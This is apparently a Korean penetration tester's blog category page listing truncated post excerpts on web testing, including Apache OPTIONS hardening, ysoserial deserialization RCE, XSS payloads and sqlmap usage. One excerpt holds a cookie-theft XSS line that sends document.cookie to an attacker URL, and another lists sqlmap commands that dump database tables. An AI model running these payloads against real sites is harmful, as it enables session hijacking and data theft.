목록# 나/pentest (WEB) (95)
의미없는 블로그
보호되어 있는 글입니다.
보호되어 있는 글입니다.
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/bNBlD6/btqD6P7hc1y/BB8RQdGbnqdf10ZRbCayoK/img.png)
OPTIONS 날리면 응답헤더에 Allow 메소드 뜨는거 예전엔 안잡았었는데 여긴 잡는다 Apache 2.0.54 이고 응답헤더에 메소드들 나온다 httpd.conf 에서 설정을 해주면 되는데 에다가 하는 방법이 있고 에다가 하는 방법이 있다 아래는 에 설정한 것 둘중 아무거나 설정하면 된다 //루트로만 지정해줘도 하위까지 다 차단된다 Order deny,allow Deny from all Order deny,allow Deny from all 서버 재부팅 후 (service httpd restart) OPTIONS 날리면 이제 안나옴 에다가 설정할땐 유의할 점이 모든 에 다 설정해줘야 한다 Order deny,allow Deny from all Order deny,allow Deny from all 아..
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/bhp7ER/btqAq3nCtJk/9fJYhumc2uibbj4p8dnjl1/img.png)
자바 직렬화/역직렬화 라고 해서 자바 객체를 Stream 형식으로 해서 전송 가능한 형태로 만드는게 직렬화 그 반대가 역직렬화 인 것 같은데 직렬화/역직렬화 할 때 취약점 발생 포인트가 있나보다 그걸 사용한 취약점 검증 툴 이라고 하네? 잘 모르겠고 RCE 취약점 검증할 때 가끔 쓰이길래 정리쓰 참고 : https://github.com/frohoff/ysoserial 다운로드 : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar 참고에 github 들어가서 download 받을 수 있다(ysoserial-master-SNAPSHOT.jar) 웹로직에서 RCE 테스트 해보기 아래 파일은 ..
보호되어 있는 글입니다.
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/cQABmk/btqAflPVUwU/5CXx5RepTTrovjnHKTud7K/img.png)
쿠키 탈취 스크립트는 보통 이거 쓰는데 싱글쿼터나 더블쿼터 막혀있으면 이렇게 아스키값으로 쓰면 된다 아스키 변환 사이트는 여기고 https://www.easycalculation.com/ascii-hex.php 이렇게 괄호 안의 값 아스키로 변환해서 넣으면 된다 String.fromCharCode(document.location="http://test.com/test.php?cookie="+document.cookie;) 1) 공격자가 자신의 서버(150.24.95.134)에 쿠키값 탈취하는 페이지(test.php) 생성한다 2) test.php 작성하고 cookie.txt 만들어 놓기 3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버로 쿠키값 보내는 스크립트) [원래 스크립트] [아..
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/v7hjG/btqAcczkJv2/va1VZbgseOKkjpMqZgVaKK/img.png)
싱글쿼터 안들어가는 XSS 구문 1) 공격자 서버(192.168.211.131)에 test.html 생성 2) test.html 내용 (희생자 PC의 notepad 실행시키는) 3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버의 test.html 접속하는 스크립트) 4) 희생자가 XSS 포인트 클릭 5) 희생자 PC에서 notepad 실행됨 IE 취약한 브라우저에서만 된다 ActiveX 설정 관련
![](http://i1.daumcdn.net/thumb/C150x150/?fname=https://blog.kakaocdn.net/dn/ck71Ke/btqzTEhM2Jo/kdVD8dWsufZHhydBN8VpxK/img.png)
안쓰니까 맨날 까먹는 sqlmap 취약 포인트 찾았으면 DB 부터 조회해본다~ sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --dbs 만약에 POST 면 --data="[파라미터]" 이거 추가해주면 될듯 DB 고르고 테이블 조회하기 sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" -D [DB명] --tables 특정 테이블의 컬럼 조회하기 sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] --columns 데이터 보려면 sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] --dump sqlmap..